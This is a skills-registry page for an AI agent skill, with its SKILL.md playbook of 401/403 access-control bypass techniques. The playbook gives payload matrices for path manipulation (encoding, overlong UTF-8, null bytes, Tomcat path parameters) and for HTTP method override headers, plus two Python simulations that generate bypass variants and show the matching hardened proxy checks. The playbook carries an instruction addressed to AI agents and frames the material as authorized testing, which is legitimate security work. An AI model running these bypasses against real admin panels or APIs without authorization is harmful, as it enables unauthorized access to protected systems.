
401 403 Bypass Techniques
Run a structured 401/403 bypass playbook when authorized testing hits forbidden responses on admin paths or APIs.
Overview
401-403-bypass-techniques is an agent skill for the Ship phase that documents 401/403 forbidden bypass methods across paths, verbs, headers, and protocols, for use in authorized testing.
Install
npx skills add https://github.com/yaklang/hack-skills --skill 401-403-bypass-techniques
What is this skill?
- Path manipulation matrix: trailing slash, encoding, normalization, and verb+path combinations
- HTTP method tampering and override headers beyond a single X-Original-URL trick
- Header injection bypasses including X-Forwarded-For and related routing hints
- Protocol downgrade and combination attacks with links to smuggling and Host attacks
- Routing to related skills: auth flaws, WAF bypass, Host header, request smuggling, HTTP/2
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You get access denied on promising endpoints and only remember one or two header tricks, so real ACL gaps stay untested.
Who is it for?
Authorized pentesters, bug-bounty hunters, and indie builders hardening their own SaaS or API gateways before launch.
Skip if: Unauthorized probing of third-party systems, compliance-only checkbox audits with no hands-on testing scope, or replacing formal penetration-test reports.
When should I use this skill?
Encountering access-denied responses on admin panels, API endpoints, or restricted paths during authorized security testing.
What do I get? / Deliverables
You work through a systematic bypass matrix, combine path and verb variants, and know which related auth, WAF, and smuggling skills to invoke next.
- Bypass attempt checklist results
- Documented working path/header/method combinations
- Notes for remediation or WAF tuning
How it compares
Offensive playbook for access-control testing—not a WAF vendor integration and not a passive dependency scanner.
Common Questions / FAQ
Who is 401-403-bypass-techniques for?
Security-minded solo builders and testers with explicit authorization who need agent-guided bypass checklists when 401/403 block further assessment.
When should I use 401-403-bypass-techniques?
During Ship security work when admin or API routes return forbidden, before launch on staging, or when validating proxy versus backend path rules after deploy changes.
Is 401-403-bypass-techniques safe to install?
The skill describes active attack techniques; only use in legal scope, limit agent network permissions, and review the Security Audits panel on this Prism page before installing.
SKILL.md - 401 403 Bypass Techniques
# SKILL: 401/403 Bypass Techniques — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Comprehensive 401/403 forbidden bypass techniques. Covers path normalization tricks, HTTP method override, header-based bypasses (X-Original-URL, X-Forwarded-For), protocol version tricks, and combination attacks. Base models typically know 2-3 header bypasses but miss the full matrix of path manipulation variants and verb+path combos.

## 0. RELATED ROUTING

- [authbypass-authentication-flaws](../authbypass-authentication-flaws/SKILL.md) — broader auth bypass (login flaws, session handling)
- [waf-bypass-techniques](../waf-bypass-techniques/SKILL.md) — when the bypass is WAF-specific rather than access control
- [http-host-header-attacks](../http-host-header-attacks/SKILL.md) — Host header manipulation for routing bypass
- [request-smuggling](../request-smuggling/SKILL.md) — smuggle past access controls entirely
- [http2-specific-attacks](../http2-specific-attacks/SKILL.md) — h2c smuggling to bypass proxy ACLs

---

## 1. PATH MANIPULATION BYPASSES

The core idea: the reverse proxy/WAF checks one path format, but the backend normalizes differently.

### 1.1 Trailing Slash / Missing Slash

```
/admin    → 403
/admin/   → 200 ✓ (trailing slash)
/admin/.  → 200 ✓ (trailing dot)
```

### 1.2 Case Sensitivity

```
/admin → 403
/Admin → 200 ✓
/ADMIN → 200 ✓
/aDmIn → 200 ✓
```

Works when: the proxy rule is case-sensitive but the backend is case-insensitive (common on Windows/IIS).
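The whole path matrix in section 1 (the trailing-slash and case variants above, and the encoding, dot-segment, null-byte, path-parameter, trailing-character and backslash variants listed in 1.3 through 1.11) comes from a single mismatch: the proxy decides on the raw bytes, the backend decides on its own normalized form. The script below is an added example written for this page, not code from the hack-skills repository. It generates the matrix for a protected path, runs each spelling through a simulated edge ACL (exact, case-sensitive compare on the raw path) and a simulated backend (double percent-decode, lenient overlong-UTF-8 handling, NUL truncation, `;` parameter stripping, case folding, backslash-to-slash, dot-segment resolution), lists the spellings that pass the edge yet still land on the protected route, and shows that evaluating the ACL on the canonical form closes every one of them. Both the edge rule and the backend behaviour are assumptions; substitute the behaviour of the stack you are testing.

```python
"""Section 1 of the playbook in code: a generator for the path-manipulation
matrix plus a simulated proxy/backend pair whose path handling disagrees.

Added example for this page, not code from the hack-skills repository. The
edge ACL and the backend normalization below are assumptions standing in for
a real reverse proxy and application server; replace them with the behaviour
of the stack under test.
"""
from posixpath import normpath
from urllib.parse import unquote_to_bytes

PROTECTED = "/admin"


def overlong_utf8(ch: str) -> str:
    """Percent-encoded two-byte overlong UTF-8 for an ASCII char ('/' -> %C0%AF)."""
    code = ord(ch)
    return "%%%02X%%%02X" % (0xC0 | (code >> 6), 0x80 | (code & 0x3F))


def path_variants(path: str) -> list[str]:
    """Spellings from sections 1.1-1.11 to try against a protected path."""
    seg = path.strip("/")
    first = "/%%%02X%s" % (ord(seg[0]), seg[1:])              # encode first char
    variants = [
        path + "/", path + "/.",                               # 1.1 trailing slash / dot
        "/" + seg.capitalize(), "/" + seg.upper(),             # 1.2 case
        first, "/" + "".join("%%%02X" % ord(c) for c in seg),  # 1.3 URL encoding
        "/%25" + first[2:], path + "%252f",                    # 1.4 double encoding
        "/" + seg[:-1] + overlong_utf8(seg[-1]),               # 1.5 overlong last char
        "/" + overlong_utf8("/") + seg,                        # 1.5 overlong '/'
        "/./" + seg, "//" + seg, path + "/./", path + "..;/",  # 1.6 dot segments
        "/..;" + path,                                         # 1.6 Tomcat ..; prefix
        path + "%00", path + "%00.json",                       # 1.7 null byte
        path + ";foo=bar", path + ";",                         # 1.8 path parameters
        path + "%20", path + "%09", path + "?", path + ".json",  # 1.9 trailing chars
        path + "\\",                                           # 1.10 backslash
        "///" + seg + "///", "/%2e/" + seg,                    # 1.11 combinations
    ]
    return list(dict.fromkeys(variants))                       # dedupe, keep order


def edge_allows(raw_path: str) -> bool:
    """Simulated proxy ACL (assumption): exact, case-sensitive compare on the raw path."""
    return raw_path != PROTECTED


def lenient_decode(raw: bytes) -> str:
    """Bytes -> text the permissive way: accept overlong %C0xx/%C1xx sequences as
    their ASCII value (the classic IIS flaw) and pass every other byte through."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def backend_normalize(raw_path: str) -> str:
    """Simulated application server (assumption): decodes twice, truncates at
    NUL and '?', strips ';' path parameters, folds case, treats '\\' as '/',
    drops trailing whitespace and resolves dot segments."""
    p = lenient_decode(unquote_to_bytes(unquote_to_bytes(raw_path)))
    p = p.split("\x00", 1)[0].split("?", 1)[0]
    p = "/".join(seg.split(";", 1)[0] for seg in p.split("/"))
    p = p.replace("\\", "/").rstrip(" \t").lower()
    return normpath("/" + p.lstrip("/"))


def hardened_edge_allows(raw_path: str) -> bool:
    """Fix: evaluate the ACL on the backend's canonical form, not on the raw bytes."""
    return backend_normalize(raw_path) != PROTECTED


def find_bypasses(edge=edge_allows) -> list[str]:
    """Variants the edge lets through that the backend still routes to PROTECTED."""
    return [v for v in path_variants(PROTECTED)
            if edge(v) and backend_normalize(v) == PROTECTED]


if __name__ == "__main__":
    for v in find_bypasses():
        print(f"{v!r:28} -> edge 200, backend serves {PROTECTED}")
    print("after fix:", find_bypasses(edge=hardened_edge_allows))
```

Two of the generated spellings (`/admin.json` and `/admin..;/`) do not reach the protected route on this particular backend, which is the reason to run the matrix rather than trust a list: whether a variant works depends on the exact normalization pair in front of you, so record the 404s alongside the 200s when you write up the working combinations.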
### 1.3 URL Encoding

```
/admin            → 403
/%61dmin          → 200 ✓ (encode 'a')
/admi%6e          → 200 ✓ (encode 'n')
/%61%64%6d%69%6e  → 200 ✓ (full encode)
```

### 1.4 Double URL Encoding

```
/admin         → 403
/%2561dmin     → 200 ✓ (%25 = %, decoded twice: %61 → a)
/admin%252f    → 200 ✓
/admin..%252f  → 200 ✓
```

### 1.5 Unicode / UTF-8 Encoding

```
/admin        → 403
/admi%C0%AE   → 200 ✓ (overlong UTF-8 for '.')
/admi%C1%AE   → 200 ✓ (overlong UTF-8 for 'n')
/%C0%AFadmin  → 200 ✓ (overlong '/')
```

Works when: the backend accepts non-shortest-form UTF-8 that the proxy either rejects or passes through untouched. The lead byte fixes the range: %C0 followed by a continuation byte encodes 0x00-0x3F (`.`, `/`), %C1 encodes 0x40-0x7F (letters), so a sequence such as %C0%6E is not a valid overlong form of `n`.

### 1.6 Dot-Segment / Path Traversal

```
/admin      → 403
/./admin    → 200 ✓
//admin     → 200 ✓
/admin/./   → 200 ✓
/.//admin   → 200 ✓
/admin..;/  → 200 ✓ (Tomcat path parameter)
```

### 1.7 Null Byte

```
/admin            → 403
/admin%00         → 200 ✓
/admin%00.json    → 200 ✓
/%00/admin        → 200 ✓
```

### 1.8 Path Parameter Injection

```
/admin          → 403
/admin;foo=bar  → 200 ✓ (Tomcat/Java treats ; as path param)
/admin;         → 200 ✓
/admin;x        → 200 ✓
```

### 1.9 Trailing Special Characters

```
/admin%20  (space)
/admin%09  (tab)
/admin?    (empty query)
/admin.json
/admin.html
/admin/~
```

### 1.10 Backslash (Windows/IIS)

```
/admin\
/admin\..\/
\..\admin
```

### 1.11 Combined Path Tricks

```
///admin///
/./admin/./
/admin/..;/admin  (Tomcat)
/%2e/admin
```

---

## 2. HTTP METHOD BYPASS

### 2.1 Direct Method Change

```
GET /admin      → 403
POST /admin     → 200 ✓
PUT /admin      → 200 ✓
PATCH /admin    → 200 ✓
DELETE /admin   → 200 ✓
OPTIONS /admin  → 200 ✓ (may leak allowed methods)
TRACE /admin    → 200 ✓ (may reflect headers — XST)
HEAD /admin     → 200 ✓ (same as GET but no body — confirms access)
```

### 2.2 Method Override Headers

When the proxy blocks by method, but the backend reads override headers:

```http
GET /admin HTTP/1.1
X-HTTP-Method-Override: PUT

GET /admin HTTP/1.1
X-Method-Override: POST

GET /admin HTTP/1.1
X-HTTP-Method: DELETE

POST /admin HTTP/1.1
X-HTTP-Method-Override: PATCH

_method=PUT (in POST body — Rails, Laravel)
```

### 2.3 Custom / Invalid Methods

```
FOOBAR /admin HTTP/1.1 → some ACLs only check
```
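Sections 2.1 and 2.2 describe the same shape of mismatch for verbs: the proxy filters on the request-line method while the backend dispatches on whatever method-override header or `_method` field it honours. The following added example (written for this page, not taken from the hack-skills repository) models that with a simulated edge ACL that blocks PUT, PATCH and DELETE under `/admin` but looks only at the request line, a backend that resolves the effective method from the three header names in 2.2 or from a `_method` form field, and a hardened edge that refuses override headers on protected paths and applies the verb ACL to the effective method. The route, the ACL and the override precedence are assumptions chosen for illustration.

```python
"""Section 2 of the playbook in code: a proxy that filters on the request-line
verb while the backend dispatches on method-override headers or a _method form
field, and the edge check that closes the gap.

Added example for this page, not code from the hack-skills repository. The
edge ACL, the '/admin' route and the override semantics are assumptions chosen
to illustrate sections 2.1 and 2.2; the header names are those the playbook
lists.
"""
from urllib.parse import parse_qs

PROTECTED_PREFIX = "/admin"
DENIED_VERBS = {"PUT", "PATCH", "DELETE"}
OVERRIDE_HEADERS = ("x-http-method-override", "x-method-override", "x-http-method")


def edge_allows(method: str, path: str, headers: dict, body: str = "") -> bool:
    """Simulated proxy ACL (assumption): no destructive verbs on the admin API.
    It inspects only the request-line method; headers and body are ignored."""
    return not (path.startswith(PROTECTED_PREFIX) and method.upper() in DENIED_VERBS)


def effective_method(method: str, headers: dict, body: str = "") -> str:
    """The verb a framework honouring overrides actually routes on (section 2.2):
    an override header wins, then a _method field in a POST body, else the real verb."""
    lower = {k.lower(): v for k, v in headers.items()}
    for name in OVERRIDE_HEADERS:
        if name in lower:
            return lower[name].upper()
    if method.upper() == "POST":
        form = parse_qs(body)
        if "_method" in form:                          # Rails / Laravel style
            return form["_method"][0].upper()
    return method.upper()


def override_attempts(path: str) -> list[tuple[str, dict, str]]:
    """Section 2 attempts for landing a DELETE on `path` when DELETE itself is blocked."""
    return [
        ("DELETE", {}, ""),                                    # 2.1 direct verb
        ("GET", {"X-HTTP-Method-Override": "DELETE"}, ""),     # 2.2 header on GET
        ("POST", {"X-Method-Override": "DELETE"}, ""),         # 2.2 alternate names
        ("POST", {"X-HTTP-Method": "DELETE"}, ""),
        ("POST", {}, "_method=DELETE"),                        # 2.2 body field
    ]


def find_bypasses(path: str = PROTECTED_PREFIX, edge=edge_allows):
    """Attempts the edge lets through that the backend then dispatches as DELETE."""
    return [
        (m, h, b) for m, h, b in override_attempts(path)
        if edge(m, path, h, b) and effective_method(m, h, b) == "DELETE"
    ]


def hardened_edge_allows(method: str, path: str, headers: dict, body: str = "") -> bool:
    """Fix: on protected paths refuse override headers outright, and apply the verb
    ACL to the method the backend will actually use, including _method bodies."""
    if path.startswith(PROTECTED_PREFIX) and any(h.lower() in OVERRIDE_HEADERS for h in headers):
        return False
    return edge_allows(effective_method(method, headers, body), path, headers, body)


if __name__ == "__main__":
    for m, h, b in find_bypasses():
        print(f"{m} /admin {str(h or b):40} -> edge 200, backend runs DELETE")
    print("after fix:", find_bypasses(edge=hardened_edge_allows))
```

Against a real target, send the same five requests and compare: a 403 on the bare DELETE together with a 200 or 204 on any of the override forms is the finding. The remediation note that goes with it is to strip or reject override headers at the edge and to evaluate method rules after override resolution, not before.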